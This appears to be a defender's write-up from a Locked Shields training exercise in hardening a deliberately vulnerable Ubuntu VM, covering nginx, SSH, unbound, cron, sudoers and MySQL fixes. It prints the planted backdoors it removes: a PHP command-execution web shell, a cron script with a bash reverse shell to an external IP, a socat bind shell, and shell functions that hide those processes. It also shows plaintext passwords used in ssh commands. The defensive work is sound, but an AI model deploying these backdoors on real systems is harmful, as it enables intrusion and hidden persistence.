ls-2024-selection/report/Report.md

814 lines
34 KiB
Markdown

# LS 2024 selection
### initial instructions
```txt
λ sshpass -p Admin1Admin1 ssh root@64.227.120.192
Last login: Fri Feb 2 08:01:16 2024 from 31.220.83.175
_ _ _ _____ _ _ _ _ ___ _ _
| | | | | |/ ____| | (_) | | | | |__ \| || |
| | ___ ___| | _____ __| | (___ | |__ _ ___| | __| |___ ) | || |_
| | / _ \ / __| |/ / _ \/ _` |\___ \| '_ \| |/ _ \ |/ _` / __| / /|__ _|
| |___| (_) | (__| < __/ (_| |____) | | | | | __/ | (_| \__ \/ /_ | |
|______\___/ \___|_|\_\___|\__,_|_____/|_| |_|_|\___|_|\__,_|___/____| |_|
Welcome to the very vulnerable VM, somewhat similar what we can expect at Locked
Shields.
There are few tasks for you:
- protect the VM preserving the following services in running (and secure)
state:
- web server
- ssh server: all users (including root) should be allowed to login
- dns server
- identify as many vulnerabilities in the VM as possible
- all passwords are set to `Admin1Admin1`. You are encouraged to change them.
- write down the vulnerabilities with short explanation what this vulnerability
can cause
- write ansible playbook (preferred) or a bash script, which will mitigate the
vulnerabilities and will still serve the web, ssh and dns services
- share the "documentation" with description of identified vulnerabilities and
code to lockedshields@ssrd.io. Github links preferred.
Some notes:
- the VM will be forcefully shutdown so make changes permanent
- root user should be allowed to login from 138.68.128.150 with the following ssh
keys:
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC55vv1HAHwUOxZ+Zn4IcswclUkLEP2eA0tJG3BwE0pO
- ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINKOliO5L0TA84lclwmsdu+Wcm/r3LDQH9G2jICZ3ECC
- defense (and documentation, either through code or description) is more
important than finding vulnerabilities
- you do not need to go into details explaining vulnerabilities
- we will share the planted vulnerabilities afterwards
```
### initial ps
```bash
root@ls-2024-9:~# ps auxf
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S 07:59 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [rcu_par_gp]
root 5 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [slub_flushwq]
root 6 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [netns]
root 7 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:0-cgroup_destroy]
root 8 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/0:0H-events_highpri]
root 9 0.1 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:0-ext4-rsv-conversion]
root 10 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [mm_percpu_wq]
root 11 0.0 0.0 0 0 ? S 07:59 0:00 \_ [rcu_tasks_rude_]
root 12 0.0 0.0 0 0 ? S 07:59 0:00 \_ [rcu_tasks_trace]
root 13 0.0 0.0 0 0 ? S 07:59 0:00 \_ [ksoftirqd/0]
root 14 0.2 0.0 0 0 ? I 07:59 0:00 \_ [rcu_sched]
root 15 0.0 0.0 0 0 ? S 07:59 0:00 \_ [migration/0]
root 16 0.0 0.0 0 0 ? S 07:59 0:00 \_ [idle_inject/0]
root 17 0.1 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:1-cgroup_destroy]
root 18 0.0 0.0 0 0 ? S 07:59 0:00 \_ [cpuhp/0]
root 19 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kdevtmpfs]
root 20 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [inet_frag_wq]
root 21 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kauditd]
root 22 0.0 0.0 0 0 ? S 07:59 0:00 \_ [khungtaskd]
root 23 0.0 0.0 0 0 ? S 07:59 0:00 \_ [oom_reaper]
root 24 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [writeback]
root 25 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kcompactd0]
root 26 0.0 0.0 0 0 ? SN 07:59 0:00 \_ [ksmd]
root 27 0.0 0.0 0 0 ? SN 07:59 0:00 \_ [khugepaged]
root 73 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kintegrityd]
root 74 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kblockd]
root 75 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [blkcg_punt_bio]
root 76 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [tpm_dev_wq]
root 77 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ata_sff]
root 78 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [md]
root 79 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [edac-poller]
root 80 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [devfreq_wq]
root 81 0.0 0.0 0 0 ? S 07:59 0:00 \_ [watchdogd]
root 82 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:1-ext4-rsv-conversion]
root 83 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/0:1H-kblockd]
root 85 0.0 0.0 0 0 ? S 07:59 0:00 \_ [kswapd0]
root 86 0.0 0.0 0 0 ? S 07:59 0:00 \_ [ecryptfs-kthrea]
root 88 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kthrotld]
root 89 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [acpi_thermal_pm]
root 90 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:2-ext4-rsv-conversion]
root 91 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_0]
root 92 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_0]
root 93 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_1]
root 94 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_1]
root 95 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:3-events_unbound]
root 96 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [vfio-irqfd-clea]
root 97 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [mld]
root 98 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ipv6_addrconf]
root 107 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kstrp]
root 110 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [zswap-shrink]
root 111 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kworker/u3:0]
root 116 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [charger_manager]
root 154 0.0 0.0 0 0 ? S 07:59 0:00 \_ [scsi_eh_2]
root 155 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [cryptd]
root 156 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [scsi_tmf_2]
root 214 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [raid5wq]
root 258 0.0 0.0 0 0 ? S 07:59 0:00 \_ [jbd2/vda1-8]
root 259 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [ext4-rsv-conver]
root 353 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:4-flush-252:0]
root 357 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:2-events]
root 362 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kaluad]
root 363 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpath_rdacd]
root 364 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpathd]
root 365 0.0 0.0 0 0 ? I< 07:59 0:00 \_ [kmpath_handlerd]
root 401 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:5-ext4-rsv-conversion]
root 404 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:6-flush-252:0]
root 816 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/0:3-events]
root 1209 0.0 0.0 0 0 ? I 07:59 0:00 \_ [kworker/u2:7]
root 1 0.9 1.1 100872 11332 ? Ss 07:59 0:02 /sbin/init
root 324 0.0 1.4 31768 14440 ? S<s 07:59 0:00 /lib/systemd/systemd-journald
root 366 0.0 2.7 289316 27100 ? SLsl 07:59 0:00 /sbin/multipathd -d -s
root 369 0.0 0.6 22780 6284 ? Ss 07:59 0:00 /lib/systemd/systemd-udevd
systemd+ 436 0.0 0.8 16252 8436 ? Ss 07:59 0:00 /lib/systemd/systemd-networkd
systemd+ 442 0.0 0.6 89360 6476 ? Ssl 07:59 0:00 /lib/systemd/systemd-timesyncd
root 459 0.0 0.0 1088 52 ? S 07:59 0:00 nftablesd
message+ 521 0.0 0.4 8560 4508 ? Ss 07:59 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 528 0.0 1.9 33108 19412 ? Ss 07:59 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 529 0.0 2.8 220240 28048 ? Ss 07:59 0:00 php-fpm: master process (/etc/php/8.1/fpm/php-fpm.conf)
www-data 591 0.0 1.4 220680 14560 ? S 07:59 0:00 \_ php-fpm: pool www
www-data 592 0.0 1.0 220680 10260 ? S 07:59 0:00 \_ php-fpm: pool www
syslog 532 0.0 0.5 222404 5352 ? Ssl 07:59 0:00 /usr/sbin/rsyslogd -n -iNONE
root 534 1.5 2.7 1245220 27752 ? Ssl 07:59 0:03 /usr/lib/snapd/snapd
root 535 0.0 0.6 14908 6392 ? Ss 07:59 0:00 /lib/systemd/systemd-logind
unbound 575 0.0 1.6 30168 16312 ? Ss 07:59 0:00 /usr/sbin/unbound -d -p
mysql 608 1.5 39.4 1322632 391232 ? Ssl 07:59 0:03 /usr/sbin/mysqld --skip-grant-tables
root 638 0.0 0.2 55936 2456 ? Ss 07:59 0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data 639 0.0 0.6 56552 6084 ? S 07:59 0:00 \_ nginx: worker process
root 815 0.0 0.4 1230260 4348 ? Ssl 07:59 0:00 /opt/digitalocean/bin/droplet-agent
root 820 0.0 0.2 7288 2820 ? Ss 07:59 0:00 /usr/sbin/cron -f -P
daemon 834 0.0 0.1 3864 1236 ? Ss 07:59 0:00 /usr/sbin/atd -f
root 835 0.0 0.4 9496 4336 ? Ss 07:59 0:00 /usr/sbin/fwknopd
root 843 0.0 0.1 6220 1164 ttyS0 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220
root 845 0.0 0.1 6176 1060 tty1 Ss+ 07:59 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 860 0.0 0.9 15432 9408 ? Ss 07:59 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 1660 0.0 1.0 16000 10008 ? Ss 08:01 0:00 \_ sshd: root@pts/0
root 1667 0.0 0.4 5684 4952 pts/0 Ss 08:01 0:00 \_ -bash
root 1679 0.0 0.3 7208 2980 pts/0 R+ 08:03 0:00 \_ ps auxf
root 978 0.0 0.2 9688 2416 ? Ss 07:59 0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
root 1151 0.0 2.4 82904 24156 ? Ss 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1202 0.0 0.9 83212 9388 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1203 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1204 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1205 0.0 0.9 83212 9432 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
www-data 1206 0.0 0.9 83212 9436 ? S 07:59 0:00 \_ apache2 -DFOREGROUND
root 1651 0.0 0.4 41224 4792 ? Ss 07:59 0:00 /usr/lib/postfix/sbin/master -w
postfix 1654 0.0 0.7 41564 7340 ? S 07:59 0:00 \_ pickup -l -t unix -u -c
postfix 1655 0.0 0.7 41608 7392 ? S 07:59 0:00 \_ qmgr -l -t unix -u
postfix 1662 0.0 1.3 48160 13808 ? S 08:01 0:00 \_ smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix 1664 0.0 1.2 47332 12188 ? S 08:01 0:00 \_ tlsmgr -l -t unix -u -c
postfix 1665 0.0 0.6 41560 6876 ? S 08:01 0:00 \_ anvil -l -t unix -u -c
postfix 1666 0.0 0.7 41572 7080 ? S 08:01 0:00 \_ trivial-rewrite -n rewrite -t unix -u -c
```
### initially change root password
```bash
sshpass -p lockedshields2024 ssh root@64.227.120.192
```
### initial nmap scan
```bash
λ sudo nmap -sV -sC 64.227.120.192
[sudo] password for spagnologasper:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-02 09:08 CET
Nmap scan report for 64.227.120.192
Host is up (0.033s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 d9:de:f7:4d:0f:31:0e:82:3a:ad:c5:d4:c4:91:00:9a (ECDSA)
|_ 256 b6:45:01:4e:3c:d7:b9:78:05:9d:4d:58:f7:1c:f1:c3 (ED25519)
25/tcp open smtp Postfix smtpd
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after: 2034-01-29T14:36:57
|_smtp-commands: ls-2024-9, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
53/tcp open domain Unbound 1.13.1
| dns-nsid:
| id.server: ls-2024-9
|_ bind.version: unbound 1.13.1
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
| tls-alpn:
|_ http/1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=ls-2024-9
| Subject Alternative Name: DNS:ls-2024-9
| Not valid before: 2024-02-01T14:36:57
|_Not valid after: 2034-01-29T14:36:57
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: Host: ls-2024-9; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.82 seconds
```
### Web server
```
server {
listen 443 ssl default_server;
listen [::]:443 ssl default_server;
#
# Note: You should disable gzip for SSL traffic.
# See: https://bugs.debian.org/773332
#
# Read up on ssl_ciphers to ensure a secure configuration.
# See: https://bugs.debian.org/765782
#
# Self signed certs generated by the ssl-cert package
# Don't use them in a production server!
#
include snippets/snakeoil.conf;
root /var/www/html;
# Add index.php to the list if you are using PHP
index index.html index.htm index.php;
listen 80 default_server;
server_name _;
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
}
location / {
# First attempt to serve request as file, then
# as directory, then fall back to displaying a 404.
try_files $uri $uri/ =404;
}
# pass PHP scripts to FastCGI server
#
location ~ \.php$ {
include snippets/fastcgi-php.conf;
# # With php-fpm (or other unix sockets):
fastcgi_pass unix:/run/php/php-fpm.sock;
# # With php-cgi (or other tcp sockets):
# fastcgi_pass 127.0.0.1:9000;
}
# deny access to .htaccess files, if Apache's document root
# concurs with nginx's one
#
#location ~ /\.ht {
# deny all;
#}
}
```
Serves files from `/var/www/html` and proxies requests to `/2048/` to `http://localhost:8018/` where we have a simple game.
Lets enable xss protection in the nginx configuration.
```bash
location /2048/ {
proxy_pass http://localhost:8018/;
proxy_set_header Host $host;
# Add security headers
add_header X-Frame-Options "SAMEORIGIN";
add_header X-Content-Type-Options "nosniff";
add_header X-XSS-Protection "1; mode=block";
}
```
And deny access to the all `.` files.
```bash
location ~ /\. {
deny all;
}
```
The process is run by the `conmon` process.
```bash
root@ls-2024-9:~# sudo lsof -i :8018
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
conmon 1147 root 5u IPv4 19949 0t0 TCP *:8018 (LISTEN)
root 1147 0.0 0.2 82724 2112 ? Ssl 07:59 0:00 /usr/bin/conmon --api-version 1 -c 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -u 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6 -r /usr/bin/crun -b /var/lib/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata -p /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/pidfile -n 2048 --exit-dir /run/libpod/exits --full-attach -s -l journald --log-level warning --runtime-arg --log-format=json --runtime-arg --log --runtime-arg=/run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/oci-log --conmon-pidfile /run/containers/storage/overlay-containers/4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6/userdata/conmon.pid --exit-command /usr/bin/podman --exit-command-arg --root --exit-command-arg /var/lib/containers/storage --exit-command-arg --runroot --exit-command-arg /run/containers/storage --exit-command-arg --log-level --exit-command-arg warning --exit-command-arg --cgroup-manager --exit-command-arg systemd --exit-command-arg --tmpdir --exit-command-arg /run/libpod --exit-command-arg --runtime --exit-command-arg crun --exit-command-arg --events-backend --exit-command-arg journald --exit-command-arg container --exit-command-arg cleanup --exit-command-arg --rm --exit-command-arg 4d05d4a1a4042edcef3194f270ace0d96e8c6b06592a073ce788d7c66b0fd9f6
```
It is a podman container.
```bash
root@ls-2024-9:~# podman ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4d05d4a1a404 docker.io/nejec/2048:latest apache2-foregroun... 2 hours ago Up 2 hours ago 0.0.0.0:8018->22/tcp 2048
root@ls-2024-9:~#
```
When going into the container we can see the php reverse shell script.
```bash
root@ls-2024-9:~# podman exec -it 4d05d4a1a404 bash
root@4d05d4a1a404:/var/www/html# ls
app.js assets index.html manifest.json service-worker.js shell.php style.css
root@4d05d4a1a404:/var/www/html# cat shell.php
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>CMD</title>
<style type="text/css">
body {
background: black;
font-family: courier,arial;
color: white;
}
</style>
</head>
<body>
<br/><br/><br/>
<center>
<form method="POST">
<input type="text" name="cmd" placeholder="cmd" size=100/>
<input type="submit" value="exec"/>
</form>
</center>
<br/><br/><br/>
<?php
if(isset($_POST['cmd'])){
echo nl2br(shell_exec($_POST['cmd'].' 2>&1'));
}
?>
</body>
root@4d05d4a1a404:/var/www/html#
```
Lets remove the file now.
```bash
podman exec -it 4d05d4a1a404 rm -rf /var/www/html/shell.php
```
### Already f-up something
Typesets. Time to delete them
```bash
netstat ()
{
command netstat "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
ps ()
{
command ps "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
pstree ()
{
command pstree "$@" | grep -Fv -e socat -e 2227 -e screen
}
quote ()
{
local quoted=${1//\'/\'\\\'\'};
printf "'%s'" "$quoted"
}
quote_readline ()
{
local ret;
_quote_readline_by_ref "$1" ret;
printf %s "$ret"
}
ss ()
{
command ss "$@" | grep -Fv -e 8953 -e socat -e 2227 -e screen
}
```
Tried:
```bash
sudo grep -E "typeset|netstat|ps|pstree|ss" /etc/profile
grep -E "typeset|netstat|ps|pstree|ss" ~/.bashrc ~/.bash_profile
grep -rE "typeset|netstat|ps|pstree|ss" ~ /etc
```
No luck.
Lets try it differently
```bash
find / -path /proc -prune -o -type f -print0 | xargs -0 grep -E "typeset"
```
No signs so just
```
unset -f netstat ps pstree ss
```
And kill them all
```bash
root@ls-2024-9:/etc/ssh# ss -ltnp | grep ':2227' | awk '{print $6}' | sed 's/.*pid=//;s/,.*//'
1673
```
After some time reverse shell is back.
```bash
root 1672 0.0 0.1 4172 1952 ? Ss 08:01 0:00 SCREEN -d -m /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
root 1673 0.0 0.0 10292 900 pts/1 Ss+ 08:01 0:00 \_ /usr/bin/socat TCP6-LISTEN:2227,reuseaddr,fork EXEC:/usr/bin/bash,stderr
```
Killed it and I hope it does not come back.
### e bit in pexec
```bash
root@ls-2024-9:/etc/ssh# lsattr /usr/bin/pexec
--------------e------- /usr/bin/pexec
```
But this should not be a problem, as it is not setuid.
### SSH
Lets not allow the empty password login
and not password login..
```bash
PermitEmptyPasswords yes -> no
PasswordAuthentication no -> no ? (this is wierd becouse I was able to login with password)
```
And I was still able to login using passowrd.
Nooooooo:
```bash
root@ls-2024-9:/etc/ssh/sshd_config.d# cat 50-cloud-init.conf
PasswordAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 /etc/ssh/ssh_host_echd_key
```
Lets remove all the other definitions and just include the
```bash
AuthorizedKeysFile .ssh/authorized_keys
```
in the sshd config.
Now we will ssh using `ssh ls2024_prep`:
```config
Host ls2024_prep
HostName 64.227.120.192
User root
Port 22
IdentityFile ~/.ssh/keys/id_ed25519_ls2024_prep
```
### DNS
Problem here is that remote control is enabled and we can use it to get the root shell.
```txt
root@ls-2024-9:/etc/unbound/unbound.conf.d# cat /etc/unbound/unbound.conf.d/remote-control.conf
# default unbound control
remote-control:
control-enable: yes
control-interface: ::0
control-use-cert: no
```
Lets disable remote control completely. and restart the service.
```bash
root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
```
This is all I found suspicious in the DNS configuration.
### Cron
Susipicious cron jobs:
```bash
root@ls-2024-9:/etc/cron.d# cat e2scrub_all
MAILTO=""
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
5-55/10 * * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/xfsscrub_all -A -r
```
The third script has a reverse shell in it:
```bash
root@ls-2024-9:/etc/cron.d# cat /sbin/xfsscrub_all
#!/bin/bash
/bin/bash -i >& /dev/tcp/138.68.128.150/8080 || true >> /dev/null 0>&1 2>&1
```
Remove the entry from the cron.
And restart the cron service.
```bash
root@ls-2024-9:/etc/cron.d# systemctl restart cron
```
And checked this one it is also safe:
```bash
root@ls-2024-9:/etc/cron.d# cat sysstat
# The first element of the path is a directory where the debian-sa1
# script is located
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
# Activity reports every 10 minutes everyday
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
# Additional run at 23:59 to rotate the statistics file
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
```
### Sudoers
```bash
root@ls-2024-9:/etc/sudoers.d# cat 90-cloud-init-users
# Created by cloud-init v. 22.4.2-0ubuntu0~22.04.1 on Thu, 01 Feb 2024 14:23:09 +0000
# User rules for root
root ALL=(ALL) NOPASSWD:ALL
```
This rule allows us to run any command as root without password. For any user.
Lets comment it out.
```bash
visudo -f /etc/sudoers.d/90-cloud-init-users
```
### Mysql database
Pretty much safe, as the database is not exposed to the internet (visible in `nmap` scan).
Only local.
```bash
bind-address = 127.0.0.1
mysqlx-bind-address = 127.0.0.1
```
BUT.......
when we look at the `ps` output. We can notice:
```bash
mysql 608 0.8 36.8 1324960 366156 ? Ssl 07:59 1:05 /usr/sbin/mysqld --skip-grant-tables
```
- `--skip-grant-tables` This option causes the server to start without using the privilege system at all.
This means that anyone can connect to the MySQL server without a password and with all privileges.
```bash
root@ls-2024-9:/etc/systemd/system# systemctl status mysql
● mysql.service - MySQL Community Server
Loaded: loaded (/lib/systemd/system/mysql.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-02-02 07:59:21 UTC; 2h 15min ago
Process: 527 ExecStartPre=/usr/share/mysql/mysql-systemd-start pre (code=exited, status=0/SUCCESS)
Main PID: 608 (mysqld)
Status: "Server is operational"
Tasks: 38 (limit: 1116)
Memory: 362.1M
CPU: 1min 7.490s
CGroup: /system.slice/mysql.service
└─608 /usr/sbin/mysqld --skip-grant-tables
Feb 02 07:59:14 ls-2024-9 systemd[1]: Starting MySQL Community Server...
Feb 02 07:59:21 ls-2024-9 systemd[1]: Started MySQL Community Server.
root@ls-2024-9:/etc/systemd/system#
```
By removing the `--skip-grant-tables` from the `mysql.service` file and restarting the service we can fix this issue.
```bash
root@ls-2024-9:/etc/systemd/system# cat /lib/systemd/system/mysql.service
# MySQL systemd service file
[Unit]
Description=MySQL Community Server
After=network.target
[Install]
WantedBy=multi-user.target
[Service]
Type=notify
User=mysql
Group=mysql
PIDFile=/run/mysqld/mysqld.pid
PermissionsStartOnly=true
ExecStartPre=/usr/share/mysql/mysql-systemd-start pre
ExecStart=/usr/sbin/mysqld --skip-grant-tables
TimeoutSec=infinity
Restart=on-failure
RuntimeDirectory=mysqld
RuntimeDirectoryMode=755
LimitNOFILE=10000
# Set enviroment variable MYSQLD_PARENT_PID. This is required for restart.
Environment=MYSQLD_PARENT_PID=1
```
```bash
root@ls-2024-9:/etc/systemd/system# systemctl daemon-reload
root@ls-2024-9:/etc/systemd/system# systemctl restart mysql.service
```
### ATD
```bash
root@ls-2024-9:/etc/systemd/system# ps -f -p 834
UID PID PPID C STIME TTY TIME CMD
daemon 834 1 0 07:59 ? 00:00:00 /usr/sbin/atd -f
```
```bash
root@ls-2024-9:/etc/systemd/system# sudo systemctl status atd
● atd.service - Deferred execution scheduler
Loaded: loaded (/lib/systemd/system/atd.service; enabled; vendor preset: enabled)
Active: active (running) since Fri 2024-02-02 07:59:27 UTC; 2h 21min ago
Docs: man:atd(8)
Main PID: 834 (atd)
Tasks: 1 (limit: 1116)
Memory: 452.0K
CPU: 5ms
CGroup: /system.slice/atd.service
└─834 /usr/sbin/atd -f
Feb 02 07:59:27 ls-2024-9 systemd[1]: Starting Deferred execution scheduler...
Feb 02 07:59:27 ls-2024-9 systemd[1]: Started Deferred execution scheduler.
```
Lets check which files does it have open:
```bash
root@ls-2024-9:/etc/systemd/system# sudo lsof -p 834
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
atd 834 daemon cwd DIR 252,1 4096 259122 /var/spool/cron/atjobs
atd 834 daemon rtd DIR 252,1 4096 2 /
atd 834 daemon txt REG 252,1 30888 73749 /usr/sbin/atd
atd 834 daemon mem REG 252,1 27072 3571 /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
atd 834 daemon mem REG 252,1 613064 4750 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
atd 834 daemon mem REG 252,1 133200 3594 /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
atd 834 daemon mem REG 252,1 2220400 69316 /usr/lib/x86_64-linux-gnu/libc.so.6
atd 834 daemon mem REG 252,1 166280 3926 /usr/lib/x86_64-linux-gnu/libselinux.so.1
atd 834 daemon mem REG 252,1 67736 4671 /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
atd 834 daemon mem REG 252,1 240936 34599 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
atd 834 daemon 0u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 1u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 2u CHR 1,3 0t0 5 /dev/null
atd 834 daemon 3uW REG 0,25 4 1442 /run/atd.pid
```
So far nothing sus. But just in case lets disable it.
- `systemctl disable --now atd`
### NFTTABLES
```bash
oot@ls-2024-9:/var/spool# sudo nft list ruleset
table ip nat {
chain CNI-5f87a854e5a6d82df88e3543 {
ip daddr 10.88.0.0/16 counter packets 0 bytes 0 accept
ip daddr != 224.0.0.0/4 counter packets 0 bytes 0 masquerade
}
